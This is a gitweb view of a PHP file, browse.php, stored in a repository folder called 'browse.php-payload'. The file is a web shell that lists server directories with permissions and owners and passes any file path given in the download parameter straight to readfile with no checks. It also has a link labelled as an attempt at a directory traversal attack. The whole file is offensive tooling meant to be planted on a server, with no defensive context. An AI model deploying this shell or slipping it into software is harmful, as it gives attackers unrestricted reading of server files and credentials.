search:
summary | log | graphiclog1 | graphiclog2 | commit | commitdiff | tree | refs | edit | fork
blame | history | raw | HEAD
modified: SpatialOmicsCoord.py
[GalaxyCodeBases.git] / php / browse.php-payload / browse.php
blob1d67b240854493f733ed128889fb1d807a01ffe3
1 <?php
2 // Version 1.0.0
3
4 if (isset($_GET['download']))
5 {
6 header('Content-Disposition: filename=' . basename($_GET['download']));
7 header('Content-Type: ' . finfo_file(finfo_open(FILEINFO_MIME_TYPE), $_GET['download']));
8 header('Content-Length: ' . filesize($_GET['download']));
9 readfile($_GET['download']);
10 die();
11 }
12
13 $path = isset($_GET['path']) ? $_GET['path'] : '';
14 ?>
15 <html>
16 <head>
17 <title><?= htmlentities('/' . $path) ?></title>
18 <style>
19 html
20 {
21 font-family: monospace;
22 font-size: 10pt;
23 }
24
25 table
26 {
27 border-spacing: 0px;
28 border-top: 1px solid #c0c0c0;
29 border-left: 1px solid #c0c0c0;
30 }
31 table tr th
32 {
33 text-align: left;
34 padding: 8px;
35 border-bottom: 1px solid #c0c0c0;
36 border-right: 1px solid #c0c0c0;
37 background-color: #fafafa;
38 }
39 table tr td
40 {
41 vertical-align: top;
42 padding: 3px 8px;
43 border-bottom: 1px solid #e0e0e0;
44 }
45 table tr td:last-child
46 {
47 border-right: 1px solid #c0c0c0;
48 }
49 table tr:hover td
50 {
51 background-color: #fafafa;
52 }
53 table tr td a
54 {
55 display: block;
56 margin: -3px -8px;
57 padding: 3px 8px;
58 }
59
60 .spacer
61 {
62 display: inline-block;
63 height: 1px;
64 }
65
66 .icon
67 {
68 display: inline-block;
69 vertical-align: text-top;
70 width: 16px;
71 height: 16px;
72 margin-right: 5px;
73 }
74 .icon.icon-dir
75 {
76 background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAB3RJTUUH4QodCzgDe8z3xAAAABd0RVh0U29mdHdhcmUAR0xEUE5HIHZlciAzLjRxhaThAAAACHRwTkdHTEQzAAAAAEqAKR8AAAAEZ0FNQQAAsY8L/GEFAAABI0lEQVR4nI2SXU7CQBSFuwQ2ZWulhFe3Ywyg0WAwRqPBQHQhBBUFFKtLMCmd/qCAz8bjvYM0GQvOTHJyn75vOr3Hsn7P52sJ8xcPc9/DjPPsYToqLvJUxMfjlsz7kDJwfevvYRjpNeWK0gaSFuWS0gTiC8o5EJ1RTjEZuMgLfM8IRnSCSX+FYCYFehjiGOlKAb3ZBIZoIH3YzAv4Z5nAEEdI7tcK9DDC+hoBrcoERniIpOfkBbxjE/g7qCG+cxD3nEJeoIERHlCptmmNZZZ0FAE3TAdjvC9v/3rbkVMVULt0MMZ7iG7tbCoCrqcORlBFdGNnUxX0XS2MoAIhBYupCFIp+B9GsAvRtbOpCqieXBAZ2rNcFYXfyp/LNzIUdjeWc8rcDwr4lpMPISwtAAAAAElFTkSuQmCC);
77 }
78 .icon.icon-link
79 {
80 background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAALGPC/xhBQAAAAlwSFlzAAAOwwAADsMBx2+oZAAAAAd0SU1FB+EKHQs4A3vM98QAAAAZdEVYdFNvZnR3YXJlAHBhaW50Lm5ldCA0LjAuMTczbp9jAAABrklEQVQ4T42STUsCURSG5yf0YyJo16bMNNq2NoKglf2DCvugKIookkLRPjHFDLGkkCm17MuKoEVtAnVGrcw2bqK3e46aDCrNhZdz53Ke95x77kjV9XXfi+KdGcWkGZ+kWzMKN6ayrk34uOphvV8KJYzJClZbBCPvFnIJOYGcQ2hdaA3I2oVWAXVFaBlvCSMqWG1RZT0w1CW8XTQwoLb1wFAWkW9oIO6sB4aygPx5d70BDUsPDGUeuXhTg/9hZOaaGIin0gMjM4tczFAziMfjiEajkGUZkUgEJ8fHCIfDOAyFEAwG6+Cf1CSyUQOyMUMLGxBcKpUa6iAQ0MDIzIifql88Yx+ZRNiAKlPy44uKTusu2oc2WHS27/drYKSnufr36yhHNqC2qxVHFsNoG3Sw6Nvn9WpgpKegnnX9RTagO1PytPsUrRY7rAshdAw7+WzP49HASE1APRUGlcgGNDBKHrD50DPi4v3Dc5rj7s6OBkbKBoUNypENaNqUfHT+BMuYh/dVbW9uaWCkxqHIZFCObEBPRdOmgdGdqW2qTPCm2813pXapIkEZubMaC5IkSb+J6cYCnt4GFAAAAABJRU5ErkJggg==);
81 }
82 .icon.icon-file
83 {
84 background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAB3RJTUUH4QodCh4FULO74gAAABd0RVh0U29mdHdhcmUAR0xEUE5HIHZlciAzLjRxhaThAAAACHRwTkdHTEQzAAAAAEqAKR8AAAAEZ0FNQQAAsY8L/GEFAAABVklEQVR4nI2TSXLCMBBFOVJumITBYTCBQMCAYwgEuBE+BBtWWJZkV0dfnrA7i6jqL99rqbvVauXndDrRz/FIh8OB9vs97XbftN1u6SsIyPd9Wm82FATBbel5T62/DuA0TcskSFLlfD5TGIa08f3b/HPBJagMUGlNSmmSSpGUiuI8EFyvV7pcLuSt1jcmwLWtoIBrAmkFruvaTGczYgK8GQIOZ4I4liRMtE5oMv3gAjQsKQQ1WJVwIRhPJlyAbqNZDJYVLOLYCtzxOxdgVBA04fgBjkQmGLljLsCcM4FsgHlEJRgMR1ywWq2NIOGgqVzAmUBTfzDkArNhpI2gCUcPcBQJuydOv88Fi+UyE4h6xSJ3A99zQc954wKznvZ9TTASooQLQafncMFsPq8Lojr4KGh3u1yA9bT/4B95aXe4AOuJDcOSYM4YFbqNhuHNuDYqA35+bZeCXx4hpVjDFh23AAAAAElFTkSuQmCC);
85 }
86 </style>
87 </head>
88 <body>
89 <table>
90 <tr>
91 <th><div class="spacer" style="width: 10px;"></div>Name</th>
92 <th align="right">Size</th>
93 <th>Modified</th>
94 <th>Permissions</th>
95 <th>Owner</th>
96 <th>Group</th>
97 </tr>
98 <?php
99 print('<tr>');
100 print('<td colspan="6"><a href="?path=' . urlencode(($path == '' ? '' : $path . '/') . '..') . '" title="Attempt directory traversal attack by adding \'..\' to the path (recommended when in top level directory)"><div class="spacer" style="width: 10px;"></div>');
101 print('<div class="icon icon-dir"></div>Traverse ..</a></td>');
102 print('</tr>');
103
104 $fullTree = '';
105 $treeDepth = 0;
106 foreach (array_merge([ '.' ], explode('/', $path)) as $tree)
107 {
108 if ($tree != '')
109 {
110 $fullTree = ($fullTree == '' ? '' : $fullTree . '/') . ($tree == '.' ? '' : $tree);
111 $treeDepth += 10;
112 print('<tr>');
113 print('<td colspan="6"><a href="?path=' . urlencode($fullTree) . '"><div class="spacer" style="width: ' . $treeDepth . 'px;"></div>');
114 print('<div class="icon icon-' . (is_link($fullTree) ? 'link' : 'dir') . '"></div>' . ($tree != '.' && str_replace('/', '', str_replace('.', '', $tree)) == '' ? '&ltUp&gt;' : htmlentities($tree)) . '</a></td>');
115 print('</tr>');
116 }
117 }
118 $spacerHtml = '<div class="spacer" style="width: ' . ($treeDepth + 10) . 'px;"></div>';
119
120 $directorycount = 0;
121 $fileCount = 0;
122
123 $directoryPath = $path == '' ? '.' : $path;
124 if (is_dir($directoryPath))
125 {
126 foreach ([ 'dir', 'file' ] as $type)
127 {
128 foreach (array_diff(scandir($directoryPath), [ '.', '..' ]) as $file)
129 {
130 $fullPath = ($path == '' ? '' : $path . '/') . $file;
131 if ($type == 'dir' ^ is_file($fullPath))
132 {
133 $link = urlencode($fullPath);
134 print('<tr>');
135 if ($type == 'dir')
136 {
137 $directorycount++;
138 print('<td><a href="?path=' . $link . '">' . $spacerHtml . '<div class="icon icon-' . (is_link($fullPath) ? 'link' : 'dir') . '"></div>' . htmlentities($file) . '</a></td>');
139 print('<td align="right"></td>');
140 }
141 else
142 {
143 $fileCount++;
144 print('<td><a href="?download=' . $link . '">' . $spacerHtml . '<div class="icon icon-file"></div>' . htmlentities($file) . '</a></td>');
145 print('<td align="right">' . number_format(filesize($fullPath), 0, '', '.') . '</td>');
146 }
147 print('<td>' . date('d.m.Y H:i:s', @filemtime($fullPath)) . '</td>');
148 print('<td>' . GetFilePermissions($fullPath) . '</td>');
149 print('<td>' . (function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($fullPath))['name'] : fileowner($fullPath)) . '</td>');
150 print('<td>' . (function_exists('posix_getpwuid') ? posix_getpwuid(filegroup($fullPath))['name'] : filegroup($fullPath)) . '</td>');
151 print('</tr>');
152 }
153 }
154 }
155 }
156 else
157 {
158 print('<tr>');
159 print('<td colspan="6">Directory \'' . htmlentities('/' . $path) . '\' not found.</td>');
160 print('</tr>');
161 }
162 ?>
163 <tr>
164 <th colspan="6"><?= $directorycount ?> directories, <?= $fileCount ?> files</th>
165 </tr>
166 </table>
167 </body>
168 </html>
169 <?php
170 function GetFilePermissions($path)
171 {
172 $permissions = @fileperms($path);
173 $result = '';
174 for ($i = 0, $perm = 0x100; $i < 9; $i++, $perm >>= 1)
175 {
176 $result .= $permissions & $perm ? 'rwx'[$i % 3] : '-';
177 }
178 return $result;
179 }
180 ?>
A place to share codes with mates